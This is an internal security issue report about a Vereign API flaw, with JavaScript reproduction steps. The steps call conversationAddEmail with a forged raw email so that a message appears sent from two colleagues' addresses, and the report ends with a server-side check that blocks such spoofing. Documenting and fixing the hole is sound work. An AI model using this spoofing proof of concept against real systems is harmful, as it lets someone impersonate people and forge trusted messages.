Check that a user does not have the ability to create a fake email. As an example, a user was able to add an email to Vereign without actually sending it from Gmail, by calling the VCL API directly.

  1. Go to any environment, for example https://staging.vereign.com

  2. Get access to the VCL:

// Obtain a VCL handle from the browser console of the chosen environment
lib = await window.setupViamAPI(
  "root",
  { onEvent: () => {} },
  `${document.location.origin}/vcl/js/iframe`,
  `${document.location.origin}/api/`,
  `${document.location.origin}/wopi/`,
  `${document.location.origin}`
)
  3. Currently the user is able to add a conversation to the system by calling conversationAddEmail with a prepared message.

In the example below you can see that I used two emails in the From field: gospodin.bodurov@vereign.com, kalin.canov@vereign.com, and one email in the To field: alexey.lunin@vereign.com. So in our system this message is displayed as a message which was sent from the above two addresses.

send = async (passportId, messageId) => {
    return await lib.conversationAddEmail(passportId, `Delivered-To: example@example.com
Received: by 2002:a4f:f651:0:0:0:0:0 with SMTP id c17csp869211ivp;
        Mon, 1 Apr 2019 15:19:05 -0700 (PDT)
X-Google-Smtp-Source: APXvYqxH/ypATs94L1JJKnqdeoXCP3xprGTgaqlMfN4RVQs6oZXs3OU459etudz7udpaYH6c+Mro
X-Received: by 2002:a50:b309:: with SMTP id q9mr43778263edd.91.1554157144953;
        Mon, 01 Apr 2019 15:19:04 -0700 (PDT)
ARC-Seal: i=1; a=rsa-sha256; t=1554157144; cv=none;
        d=google.com; s=arc-20160816;
        b=HkM1GJyThICcJ6P51pPkegCoQqoXzpy6+93fYLEK1zYf8aKaZJqMPWn+6S31oQc0x8
         zszOmUoMlM3mrn7BIGNNtnnJeBjJujltM68prWe7Xf/iRE1NIHpLLaw8AdEHicmPKuyK
         dRTMfbuxXfl4pGSdO3kd+MU2Z/ftq6sedlwNgsUwziNA8mQ7CLTTCHrX2emSalIX6ao8
         PLGVD2IGTuIhfI+9vt4VCRPXIEYZ0WmCEVtCk1UYiSIGQQBCJUTeVRHUsuez3WbZy+Bm
         ipG8G5guW6v0ITQtTLNkDFsRdr2jcUcyWlJNc/gaTtdjq3iaBTu/gRt4qK/mHIfWiDkb
         HwGA==
ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;
        h=to:subject:mime-version:message-id:from:date:dkim-signature
         :mime-version;
        bh=PpaT4m835AW80DsP2mo2xZT/LYgNpBTg/TeA1fTy0vI=;
        b=Sa2Efe1rL8J6OHXHx2BFRIje2ROT+Q6BrdDoW5ySvvKtHYtTa/ztgWB0kJTmWw1tOL
         Rybn8or7vzo2bCUrWp+qMmnzjFiRyyuLColBQKMg8FWH9jB0/2Ju2TsirgiDtywGaPXr
         IGR7K62hySlqWeCskDW84N4aWaiszqD7C0n6K55ofCPpEBvCcY8gER6AFloJt7g/YBdu
         2so3aipQPUM1B9OqfngMOgR9LlQ2GbjyvGckvfCt47ZsBWK9yntPCfhwMAtU1oWmeWKV
         k1arETsmUymnDKmd6hu2kjXEsgDZMg4xfoHHFVI4Bd0P+RZ4aEAmXzcPQ6R6Es6RfdBf
         ++gw==
ARC-Authentication-Results: i=1; mx.google.com;
       dkim=pass header.i=@gmail.com header.s=dc1 header.b="HcK939/F";
       spf=pass (: domain of alexey.lunin@vereign.com designates 0.0.0.0 as permitted sender) smtp.mailfrom=example@example.com
Return-Path: <example@example.com>
Received: from example.com (dc1.example.com. [0.0.0.])
        by mx.google.com with ESMTPS id p7si128062edm.32.2019.04.01.15.19.04
        for <example@example.com>
        (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
        Mon, 01 Apr 2019 15:19:04 -0700 (PDT)
Received-SPF: pass (google.com: domain of example@example.com designates 0.0.0.0 as permitted sender) client-ip=0.0.0.0;
Authentication-Results: mx.example.com;
       dkim=pass header.i=@example.com header.s=dc1 header.b="HcK939/F";
       spf=pass (example.com: domain of example@example.com designates 0.0.0.0 as permitted sender) smtp.mailfrom=example@example.com
MIME-Version: 1.0
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=vereign.com; s=dc1;
    t=1554157143; bh=iFoLXx49XxW84s0w5bUyL8lo3y8Od4fHlKuFW9yWPTU=;
    h=Date:From:Subject:To;
    b=HcK939/Ft71xO/AR6Uhb5mPDR1ukfE4qrAU8cNxicxpiZogYjNqOTPGysneIT3os/
     unRVcWvAVv1DXZsNFsbEd8r6476mi9aem1OGRp5SGntVSVZOHsFKOuYTuraRKOKKB1
     /rUEUinaJe96ZDzjUty5WdX3c8q4eRN91EDREay8=
Date: Tue, 02 Apr 2019 02:19:00 +0400
From: gospodin.bodurov@vereign.com,kalin.canov@vereign.com
Message-Id: <fc084f35441ba5${messageId}@example.com>
Mime-Version: 1.0
Subject: [Security] Checking archiving email without real email sending
To: alexey.lunin@vereign.com

--=_d2d1e6ddf837fd97c34cc2953b26d72d
Content-Type: multipart/related; boundary="3fa1d0258d6e0c8cd3b6c983df6c007a9c19d2d68379efef3ad72df6ea6e"


--3fa1d0258d6e0c8cd3b6c983df6c007a9c19d2d68379efef3ad72df6ea6e
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable

<html><head><title>Vereign - Authentic Communication</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3DUTF-8" />=
</head><body style=3D'font-size: 10pt; font-family: Verdana,Geneva,sans-ser=
if'>
<p>Just checking that I can send a message from gospodin.bodurov@vereign.com and kalin.canov@vereign.com accounts without accessing to them with using my personal passport id</p>
</body></html>

--3fa1d0258d6e0c8cd3b6c983df6c007a9c19d2d68379efef3ad72df6ea6e--
--=_d2d1e6ddf837fd97c34cc2953b26d72d--
--W0RyLiBEYW15YW4gTWl0ZXZd--ck5GzsRpPFPCGD5mmbat8rPQSG0y1wq5GemKV--
Vereign - Authentic Communication`)
}

await send("7a1a1be2-a937-44bb-81db-64e82809b793", Math.random())
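The fix this report calls for is a server-side check before conversationAddEmail archives anything: every address in the message's From (and Sender) header must be an identity already verified for the calling passport, so the two-address From above is refused. The block below is an added example and not Vereign's own code; the header parser, canArchiveAsOwn and the verifiedByPassport lookup are assumptions, and the sample message is constructed.

```javascript
// Added example, not Vereign's code: refuse to archive a message whose
// From/Sender addresses are not verified identities of the calling passport.
// Unfold RFC 5322 header lines (continuations start with whitespace) and
// return a map of lower-cased header name -> list of raw values.
function parseHeaders(rawMessage) {
  const headerPart = rawMessage.split(/\r?\n\r?\n/)[0];
  const unfolded = headerPart.replace(/\r?\n[ \t]+/g, " ");
  const headers = {};
  for (const line of unfolded.split(/\r?\n/)) {
    const idx = line.indexOf(":");
    if (idx <= 0) continue;
    const name = line.slice(0, idx).trim().toLowerCase();
    (headers[name] = headers[name] || []).push(line.slice(idx + 1).trim());
  }
  return headers;
}
// Pull bare addresses out of a value like `"Name" <a@x.com>, b@y.com`.
function extractAddresses(value) {
  const out = [];
  for (const part of value.split(",")) {
    const m = part.match(/<([^>]+)>/) || part.match(/([^\s"<>,]+@[^\s"<>,]+)/);
    if (m) out.push(m[1].trim().toLowerCase());
  }
  return out;
}
// verifiedByPassport (assumed lookup): passportId -> Set of verified emails.
// Every From and Sender address must be in that set, otherwise refuse.
function canArchiveAsOwn(passportId, rawMessage, verifiedByPassport) {
  const verified = verifiedByPassport[passportId] || new Set();
  const headers = parseHeaders(rawMessage);
  const fromValues = headers["from"] || [];
  if (fromValues.length !== 1) return { ok: false, reason: "exactly one From header required" };
  const senders = extractAddresses(fromValues[0])
    .concat(...(headers["sender"] || []).map(extractAddresses));
  if (senders.length === 0) return { ok: false, reason: "no sender address" };
  const foreign = senders.filter((a) => !verified.has(a));
  if (foreign.length) return { ok: false, reason: "unverified sender: " + foreign.join(", ") };
  return { ok: true, reason: "" };
}
// Constructed sample: two From mailboxes, folded across a line, as in the report.
const SAMPLE_MESSAGE = [
  "From: gospodin.bodurov@vereign.com,",
  "  kalin.canov@vereign.com",
  "To: alexey.lunin@vereign.com",
  "",
  "body",
].join("\r\n");
const VERIFIED = { "passport-A": new Set(["alexey.lunin@vereign.com"]) };
```

Calling canArchiveAsOwn("passport-A", SAMPLE_MESSAGE, VERIFIED) returns ok: false with both unverified addresses in the reason, which is the outcome the API should produce for the message in this report.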
Edited by Alexey Lunin